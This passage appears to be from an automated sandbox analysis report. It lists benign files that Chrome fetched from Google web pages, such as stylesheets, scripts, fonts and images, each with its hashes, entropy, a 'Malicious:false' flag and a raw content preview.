                                                                                                                                                                                                                                                                                          SHA-512:FEAD11A3EB8BAEAFF80925AF30E40F2B1567DBA2F57DD7EA5FE9CC7383225691B64F123AD3AC018DC0CA0F12C07865C82122D08C069C006B05F267DB8F5072C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/MDzy0XxA.css
                                                                                                                                                                                                                                                                                          Preview:._markdown_1q5js_1>:first-child{margin-top:0}._markdown_1q5js_1>:last-child{margin-bottom:0}._markdown_1q5js_1 h1{font-family:Google Sans Display,Roboto,Noto,sans-serif;font-weight:500}@media (max-width: 767px){._markdown_1q5js_1 h1{font-size:28px;line-height:35px;letter-spacing:-.5px}}@media (min-width: 768px) and (max-width: 1023px){._markdown_1q5js_1 h1{font-size:32px;line-height:40px;letter-spacing:-.5px}}@media (min-width: 1024px){._markdown_1q5js_1 h1{font-size:44px;line-height:54px;letter-spacing:-.5px}}._markdown_1q5js_1 h2{font-family:Google Sans Display,Roboto,Noto,sans-serif;font-weight:400}@media (max-width: 767px){._markdown_1q5js_1 h2{font-size:28px;line-height:36px}}@media (min-width: 768px) and (max-width: 1023px){._markdown_1q5js_1 h2{font-size:40px;line-height:48px;letter-spacing:-.5px}}@media (min-width: 1024px){._markdown_1q5js_1 h2{font-size:48px;line-height:56px;letter-spacing:-.5px}}._markdown_1q5js_1 h3{font-family:Google Sans,Roboto,Noto,sans-serif;font-weight:
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17382)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):264203
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.5387999815846705
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:98Jax8eulMYeiTuG00blXol0VQbQwM87Y0WsEemtJeNle7YDQ8:92pmF2lq0Ud7WsEemvei7CL
                                                                                                                                                                                                                                                                                          MD5:F7AE519FC4C634068B77F412C54CFB74
                                                                                                                                                                                                                                                                                          SHA1:0C84A1667784BDFC1B08F0371968B75D98802881
                                                                                                                                                                                                                                                                                          SHA-256:11862A85A04F1D9C7D9838C6575D818951ADAC9E4D332594279CD25F1CF35642
                                                                                                                                                                                                                                                                                          SHA-512:81BDF0A1A510B9737D4F28792E8C09F9AFBAC379F48195E33E97038DBF44C82764BB681F35FE4EB429F398396E15A7FC5C38E358E5424CB01D652C686987051C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"64",. . "macros":[{"function":"__e"},{"function":"__j","vtp_name":"navigator.userAgent"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",2],"vtp_name":"originalLocation"},{"function":"__u","convert_case_to":1,"vtp_component":"QUERY","vtp_queryKey":"utm_source","vtp_customUrlSource":["macro",3],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":["template",["macro",1],":",["macro",4]]},{"function":"__dbg"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"G-QSH16ZFXGX"},{"function":"__c","vtp_value":"sustainability\\.google"},{"function":"__c","vtp_value":"G-TRJS1JHNT3"},
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):40912
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.557790357722363
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:V+yiVjavwvdvmv0vcvVvOYKZ7EUi41uaDDWQOZvkEVHb0Ez9K:V+yix
                                                                                                                                                                                                                                                                                          MD5:405A59EC3F3E53280398EF9A7674182D
                                                                                                                                                                                                                                                                                          SHA1:480AA6AE10D9ECDFB9A463C94A950BEC89FF3C5A
                                                                                                                                                                                                                                                                                          SHA-256:B254C2CBA618AF79496AD5A47215C17E308DDE1E2C6E5BE83E5C5FE51F1C6EAD
                                                                                                                                                                                                                                                                                          SHA-512:243C2DEB56BAEBBF7AD97DF4145366B6146D941A177DF654C5E8CBE94E430B292883D708505F75E1D78767249524F79A71BE20372609018ED3A44DBB602DEBD4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700|Google+Sans:400,500|Google+Sans+Display:400|Google+Sans+Text:300,400,500|Product+Sans:400|Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200|Material+Symbols+Rounded:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200&display=swap&lang=en"
                                                                                                                                                                                                                                                                                          Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.g
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (11433)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):11434
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.024395845609089
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:QbBFfZ/uUuCupuRuduRu8uYuTu4uzuZuguGCuGlujuBuIzu3uIuKj5BwOaRr12nk:/s/YaRrknkUUkPkCkuk5qYdo3qWI
                                                                                                                                                                                                                                                                                          MD5:467F3EBE7088A2F543D8586F41B7CBC4
                                                                                                                                                                                                                                                                                          SHA1:A278155833429E22C6EA95FBE072F78D34595DDF
                                                                                                                                                                                                                                                                                          SHA-256:541374C7672826325008062565C059B7384091D55A8D6A8985523A25597BEDF1
                                                                                                                                                                                                                                                                                          SHA-512:C7EE085A88B31A77162E16354B42099BECE96251AF38C3A963B281ADF2E898349C862DF2EC18E0A2D58BA0E81D97AB8643CB5A568ED930E0C57A7553EC032B3D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/gmail/about/static-2.0/css/partials/tabset.css?fingerprint=467f3ebe7088a2f543d8586f41b7cbc4
                                                                                                                                                                                                                                                                                          Preview:@keyframes fade-in{0%{opacity:0}100%{opacity:1}}@keyframes fade-out{0%{opacity:1}100%{opacity:0}}.tabset{position:relative;z-index:3;overflow:hidden}.tabset__tabs{align-items:center}.tabset__tabs__content{display:grid;grid-gap:36px;grid-template-columns:1fr}@media(max-width: calc(1024px - 1px)){.tabset__tabs__content{grid-column-start:1;grid-column-end:span 4}}@media(min-width: 1024px){.tabset__tabs__content{grid-column-start:1;grid-column-end:span 6;grid-row-gap:36px}}@media(min-width: 1440px){.tabset__tabs__content{grid-column-start:2;grid-column-end:span 5;padding-right:var(--grid-column-gap)}}@media(min-width: 1024px){.tabset--reverse .tabset__tabs__content{grid-column-start:7;grid-column-end:span 5}}@media(min-width: 1440px){.tabset--reverse .tabset__tabs__content{grid-column-start:7;grid-column-end:span 5;padding-left:var(--grid-column-gap);padding-right:0}}.tabset__tabs__content__section__break__container{margin:0 auto;display:grid}@media(max-width: calc(600px - 1px)){.tabset__t
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3521)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):21590
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.396142031067612
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:/h0cEX6ZB6/NfqrgR0Jlm0OU/asm0M9WkugJ6pmzF0mJJRdGbFJgBeAD+cvl2B:/chNfGgR0Jlm0OU/asm0M9Wkug26DRsj
                                                                                                                                                                                                                                                                                          MD5:80D62A6AA980F11422556FE8065B4CAB
                                                                                                                                                                                                                                                                                          SHA1:CD272FA4DAD7328B3884393E59458B4C03D4CC25
                                                                                                                                                                                                                                                                                          SHA-256:E70AA93344F17D038C8854DE1243A54A7A0AA478143E1AFBFF48DF14F0DE4343
                                                                                                                                                                                                                                                                                          SHA-512:3A73C667C7224CDFBE67B5AFC12E7C5305B49396C7E3BE3541DE1DE58C17296C86B5FD42805BB96EFA7F565B0BC9347EDF1EA51DE0B7B62FC233C5858ABB8A84
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.q("RqjULd");.var Zha=function(){var a,b,c,d;return(d=sG)!=null?d:sG=Object.freeze({Zb:function(e){return _.rf(_.He("iCzhFc"),!1)||e===-1},Jg:(a=_.Ul(_.He("y2FhP")))!=null?a:void 0,uN:(b=_.Ul(_.He("MUE6Ne")))!=null?b:void 0,eg:(c=_.Ul(_.He("cfb2h")))!=null?c:void 0,Ze:_.nA(_.He("yFnxrf"),-1),DC:_.oA(_.He("fPDxwd")).map(function(e){return _.nA(e,0)}).filter(function(e){return e>0})})},$ha=function(a){if(_.n&&_.n.performance&&_.n.performance.memory){var b=_.n.performance.memory;if(b){var c=new tG;isNaN(b.jsHeapSizeLimit)||._.xf(c,1,_.kd(Math.round(b.jsHeapSizeLimit).toString()));isNaN(b.totalJSHeapSize)||_.xf(c,2,_.kd(Math.round(b.totalJSHeapSize).toString()));isNaN(b.usedJSHeapSize)||_.xf(c,3,_.kd(Math.round(b.usedJSHeapSize).toString()));_.il(a,tG,1,c)}}},aia=function(a){if(uG()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new vG;if(b=b[0]){switc
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8054
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.965391593269203
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:N9WMmAIkLY9f7vkLr4KE3Qd/HsWXWaFQddKIlRXWf:N9WHA3U9f4HHd/M4xIlXWf
                                                                                                                                                                                                                                                                                          MD5:C01A681EFEF4BBF2910C945B60E6A70B
                                                                                                                                                                                                                                                                                          SHA1:4B755CAF0F3DAC878BE3B83CA4315278CD397F43
                                                                                                                                                                                                                                                                                          SHA-256:9E737809179FB34D682511871C99F745C2B028FB86E1591D484E96B50663E822
                                                                                                                                                                                                                                                                                          SHA-512:1D0B31993FDCD539D741A8DF38709E665862D0CDCD62F50DC5BB6B1BEBB8E0ED4A8992BB75D83AA7EF750FC4999B8AEFA07247C39A584315CF5DF3EB56B71DC7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....-IDATx..k.-Wu..k..3s.t....t%..........#.......'..P.*..).b'...<......R.q%..8..b..1...*...@.$.+!].......+......33...*..9.{.....Z{...+Z.V....hE+Z.V....hE+Z.V....,.....G...E.7...Y.......?......?q....P8...._......6..p.^<{....A...3.(.@.....k>...{bgO.......^~....G....W.6K..2......-........).....q..;..N.i..\.q."..L..o...'...i-..7....t......o....x.^dt.PW~.......c..d.{.z.5..0 ...XK...T.G.-B6ndN.&$..,.....l.b$...pD +.xd;.Q...............9Cm>}.];..6.`...0g...U..!.S..Dd...F,.emA.H...y&.J'.....7T...........R...s.o...).BX..Q....S/m-.4.9sd..M.O.;....u..sgZ.+...6/.y..|.O...5.o.m=...a.......&.....Yb.5.....,..........r........O....u...Z..u...X:y..rV\o.0A......c$uq.O...9....k........Q5...$A..w..O..b..x.....L...2.g+...q.\......[.C...../..*.#C..t.....8.......h.l.{...*d:....m......M..=\.,.c..y....on(JJ......_.:~.j..........I}....2..Z.d..]\.).H{.9o.:.zw...].P....xl.....0.:.z.U......`..r.. W*...*x...9.AV.|M..@.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):502220
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.438505233432353
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:gq0RALOrS7VPeDIMnRs5BL5kREHLvRiDtKPuuD+heOT57QL:Qu0S7VPeD3kBS+74DtG+hDT5cL
                                                                                                                                                                                                                                                                                          MD5:21204779BEBA794BB0A15EF1E67BACC5
                                                                                                                                                                                                                                                                                          SHA1:35548E7215989C071BCCB2BE50F541CB79B76ED7
                                                                                                                                                                                                                                                                                          SHA-256:52542504DB8E9BCF1CEFFE402D516FA0DCE39B6A7A4B88763457CD5532CDE9D5
                                                                                                                                                                                                                                                                                          SHA-512:EF132E326E818422535F02EC36167FD268CABA263EC1F185DC24AFA6D981C96D19895F7F62E7367AA2B8B66B6938E2546EAE417FA9B01DFFBFF71B6950CD6903
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF...WEBPVP8L..../..D..u!...R....Q.!"&..mx@.T....Ak....g.S...........}.ml.....h.@.c.6Ih0...IP.C.p.]..#h.&s.y.......)N.Lh..t..e.;...jO3.SY..%..ES...J.@n......`..`.K\.......EB\..............WuWK...N...!.a..p.:+w........:.....3. ...A..........}...m{vKm..~....wUQ.H...2 [-....c..(M.u.;.s..s.9.t.;9.>d.n...D.Y`Y ,...B..`..k..{n..-.6I.....W ">...-.cfN...TL.Q1.`.iy.h....d.U.hk...F...?...7.....H. .b.C...DItbK.....=[.$o.y......F_.....3.k.o.6..(...v.,.. .3..9.Q .@..}.._UwUw..5../l.m.l......+.#.J..F......9lkqjm`m.mc.f..f9I%.._...}...m.mj.....}...uf....OV..M...P#...Z......W....^..................m...m.......M.R.....:N:3t.Fa...+...X.\.F......W.m.Qj%.}o.......-...~......S...(.$H.Q"%*...D.#{D......,..vk.:..n... v......e........"2*W...Z.........*.."....E.jK.$...>..#.QQV77t..dff..b.o../f.J...V...2...I..EE..\8g.5}]...F.u?..}..1.....d.b9Ur.9q13...V[U{.[[.....d...!...p.s.1z...>.}.,.V.F.6i..C.y.".....}9ml......M..1..m.qc.f&000........=..[."fR.Nv..... .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):333174
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4087140940836322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:uUpi8R+QC0q29MHmjpegMty5eqHwg2MvpKzwq:ZpRsvL29MHUpMqr55q
                                                                                                                                                                                                                                                                                          MD5:824F0EAC369C633AF0D9361091312D0A
                                                                                                                                                                                                                                                                                          SHA1:F5AAE0862A4D51F85C563411B1D44BCDFB8FCD37
                                                                                                                                                                                                                                                                                          SHA-256:46C591C05AB36304491250AD958A722F5AA6E7D3444DEE3AB01FBCB3C1057590
                                                                                                                                                                                                                                                                                          SHA-512:9893D5EA3B2ED9937FC783A950D6FD46615738C754F5E91462157AB15390BDD8176E58447530FB9EC672BEACCE7977E770830798DF89834166E559FD97F19E4A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/N_lV5xwErJpAK4jkrNwMMQfbQN7gs0loaMzQHVF768czQNAHsMWW6Kk1FUJnbH0c7uleBoV0UHjS08oJX368wIdGz_4b1buadd3d5Cw=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFFn...WEBPVP8Lb.../..D..u!...R...5.Q.3......d.#Q..Z.P..`.....]n....%..P.,U...Y.wWH...kB....M.-o..@..6.1...F.G..D..eZ.t.)e1j.p..........R..+.e.\.qK...T.n/.*[P.(..a.X".....s...M,...m.)......T.XR4D..=21....Ig......}.L...J .....s_'.j...m#=...W /.Y..\.YdWo..BW.@.rH....]L....,...OM...@..p..j..FGl.jg].u...l...m....41.b...o.M;..@......N!..A..D..D@.....!i2.t}........m.$Iy.1+..AF.E.....h...#...%..8Hc.cF..}.1....07..R.$I.j.m...a....w...f......m..9:.......:u..8..|8u.=.03..Qu.F.._......T.C9.Sx.WuF[K..T..........m..H.t}.^..D.L....&...@.z.G......s.._.a..z...:..8;..t6.;.GgOD.@. Td.......?..1w7J.f}V.%I.$I.-$.z....e./n.c.Vm+..}..A........p...jm..=..}\.\....c..o..>....g`....A..p........S.d.$mT..}..{.7.....-..S:.. ....tqlxL..PN.p.p..p.9..r..]..s.n...S..............h.............H.$9.z.'r..u...7.$IbdV.|}~y....]..|.m[..m...['..#..p.N.j&..L..........p.....v.c..Hr.&.d.".....s..............................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5430
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                                                          MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                                                          SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                                                          SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                                                          SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://storage.googleapis.com/googwebreview.appspot.com/grow-ext-file-upload/1704855130612873/favicon.ico
                                                                                                                                                                                                                                                                                          Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9452
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.972633586493504
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:oluGUDoPyYMC1jr+wq+UTEbB8dZFfRg2TDN3qWpZ+8+t9:osGeo+C1uwCcARz3YW7A9
                                                                                                                                                                                                                                                                                          MD5:9471CDBEDEDB47F304694708F03522DA
                                                                                                                                                                                                                                                                                          SHA1:1A78FD5DC642031B2930B0FBBC8573A7A81AEB54
                                                                                                                                                                                                                                                                                          SHA-256:EC45B781D17011F674273C7654C2BEAECA1C097A9A38A271D57763A2CD7E2778
                                                                                                                                                                                                                                                                                          SHA-512:8E20EBEC2BC28E1BF670B21821BAA05FBD298DB86C6A8267D0BB3468A46986D11F445ED2C9BFBEEC806039EF22A557B695E2C6A2072FF35FF7FCE5B164D36C04
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/Y1i12gHz-cP0Ir3LztFSUMijuVGSe9qetVu98aQNchjhxw9byxecnFAFfhxGFyd79tgcGpJrHjJ8S_AQmFnBqtxxDAjh81bxUMe1=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x............ iCCPicc..H....XS....$$$.@(RBo.K.....6B.H(1$..;...ZP.`EWElk.dQ.........(.b...$..~...{..9s.s.N........Q5.r.y..@....&..@.!...@...( &&.@...S...P...|..._E..p.@b .q%...G...8"q...^.7..'.L.Q.M1.....3..!.4.G.m.c. ...De.......b.s2...e...\..r.d_........U. [.}.'..>.F|...#..E.J...(.=..,....l.....Q...XY..eM..1...aZT4d....\.......C..8. X3....r.....!...."....P.dX{4^..W.E...C..<IH.0...d6%...!.[.<....~|."N.-_...Y..}IV\....~P..X.+..>s...Cc.6.Y.d8/./`E.qd.?>\1...a.c...L.......Q....C.ce....!....!{....&.@n........M./.Dy1..p.L...E.....A .0...40.d.Akom/.....l .....4.#..=Bx..../H< ...(..|..2.U\.@..7_>".<..."@6.-.......C...90.l.d}?..:b.1..N.%Z.z./.G.?l...9..7{..B;......pg..P.C.L0.t..C..K.>;..zu..q..............p?8.+.~..t$.o...Ev$.dm.?....TlT\G..*.}-.q..T+h...<......#~..`G.f.4v.k.j..;..a-........1<[.<.,.G..|.9eU.8V;.8~...y..y..%h.h.X...c....d.9....Np........C..#.K.t...x.@e.7...A..@..Mg.......h.H...........7E.....+..3p......q ..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1351
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.670382994909587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TUGlkOOEfDt79bJ9LiQuqFk1LfmB9jd75rMhvhiR8d02DVvovTdv1OG9RVhDnFiW:IqkOOEL19l9LiQu/1mjUiR8d0cvm31Rn
                                                                                                                                                                                                                                                                                          MD5:47AB6E6899E70DF2FB55BE6044B40DBB
                                                                                                                                                                                                                                                                                          SHA1:A0E5BED47D683A65733E1718316E58D4AF753B08
                                                                                                                                                                                                                                                                                          SHA-256:249877417315EC69CFE02B4FEAD9E1C6BC7596A83FD6F858F6693E0615F63036
                                                                                                                                                                                                                                                                                          SHA-512:98CDA4A9FD7B6ED2097A8B3F5FBBDB9BC2BDEBBAC049E382C3B74802D96B7A84129E49B9888F30A6D4DCA6C2810E0E8FE15301392A7CCC94F44EC2FFB5BB6C45
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/6nGdwtbmSCuuGF5fSCqvv0f-GOsp927ZXRFxC1NNEqlH-EwAGEqlHXN2rcarUTB7C8Tj8shbcg-9z-CO4XJGTVSaLbT5FPsq0rKET0ZIfWNsj9_f424=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...@...@......iq.....IDATx.....H.EG*3..=f....M....cfff.....13..sL.N..T.x.qq......{p..........Tq.....yO.v..4....}.C.....u..f*..;g.X6.G..=..Z..-sa...-....-....L...p..J.&...)..R.{..B=c^..!.S..Guo....*3W9.4...=.."x......M.z.A\..Q........QV..D.HS.?....!.x.... ....Yhm].<..Q..l..|.1#...SE8..}O..~..M.e..Q.... ,/.j.....P.f.d........3u.......=&. /.....`._iv.^}....Z..........I.Z..MY.O.....+..OZ......Z.B.G.?........!...X'l...>7.i_....K..t..i...y...Bs.......v2...L..T8.l"......+........W.....#...~...,.Jn.pl9V~..4.5.........1R}.ip...x*2..3.u._e0.Z.y..|u.f!.I.x...X....@bV,.0...w.......M.......X..+._3....YB...n...*O_.k.@Z...I..o+.........U..`.@.lk.."....`..ZOE."..E_%{.`.....L`.#f.....T4...#.....,.....b?Q..4uN..:&\C.........G.>"U.l...k2.......2.8}"m7.X.(.KD6.J_2.............v.1}....lj.b.]v7..O#.h....h........i..!{.W..&.........?.A....=..A........K..>.!.......@..97!........~_...`!..."..?..~G.`.].\s.A8...7U~..9.>...@.3....\...?.`.|.0.....j..m.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x395, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):93591
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9780680931935395
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:fa6hPNoG4dP1nT40FaWzTOi0mfhouZlVzY379dyqNpp5lJ9F1xMbvUDPVQgyh678:CWNo9dP1T40FaWzSFmfhphzunlDF1xMJ
                                                                                                                                                                                                                                                                                          MD5:FE4C4E75D5FEC9216CFE3022BCF42E23
                                                                                                                                                                                                                                                                                          SHA1:8D78801C8014C85D0D1659FE5B42B0746D272D19
                                                                                                                                                                                                                                                                                          SHA-256:40B6E0677C04E1E5D918A0856FFE90537390A80FCBB06E10555340BE0B32B0AF
                                                                                                                                                                                                                                                                                          SHA-512:D23E77BD956E761AD0AB15A7C50E7B6602664961DCE915AE7E78AAF9BFC5DF654BB4BFB00F8F381EB93DED6D30C3172AD9C2CCF8EA0B3527304D70227E178751
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/4c/fa/b7956f6e4c248d07e06ddd24e0be/how-were-supporting-our-commitme-width-1600-format-webp.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................S........................!..."1.A2Qa.#q...BR..3b.....$Cr.....Sc..Ts.......4D...%dt................................5........................!1..AQ."a2Bq....R.....#.S.C............?..)....c..b_.H..aS.b.Q%.....q.i-8..(....*$...q.O...%....x.O.Z@.l..t....KI..TG.../A)...$W3c.....z8.(.q.....8.g...h..Zq...p...!..ca.....&..j..N7.db.Z..B.!q...-..B.~..H..X.V..cq.)^T.Ll....x.V.I..ap.......X....x...S.....<U....Xp.K.,X..&......<*....I.7..U\oX.Q&..t.2. T...h..cT..zq...F2..EKM8.aq.=....<xG. c..R.=.n"...U.I>.2..Z..]-...t.....c.zX.U...+..0..{..jQI*.y........$...q..R.5...1..5.@..cN....T..h..q...Q#.....O..Z...E\n.b.D.\{...,g...!..#.h.zx..U......1J.$c.p.t...*.|{...ck.:....b.I..4aQ...*REc.tck...U$...q.\x.)]-4c"1...*..kC.<....4b.E..x.m....EE.Ll..i.:x..\oX...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):157918
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6836210703728196
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:5mulSLtF67Ko4YHTmZe1SU1T4XmZfhzmS1ahYa0sbd4JVY07QoLZBdfPb9boA9x4:vlUtPYHyY1Ts2ZfYaJVY0TnbVPuiz
                                                                                                                                                                                                                                                                                          MD5:52C66B9174D4EC5F7EE156345D9660B2
                                                                                                                                                                                                                                                                                          SHA1:6A3339D208884A3C1508E763FBC150FE2A736AE9
                                                                                                                                                                                                                                                                                          SHA-256:5CCF84EFFAB2972ABAE16E8D3FDF38D0F98F30A48110337E1AC1C90621DCEB38
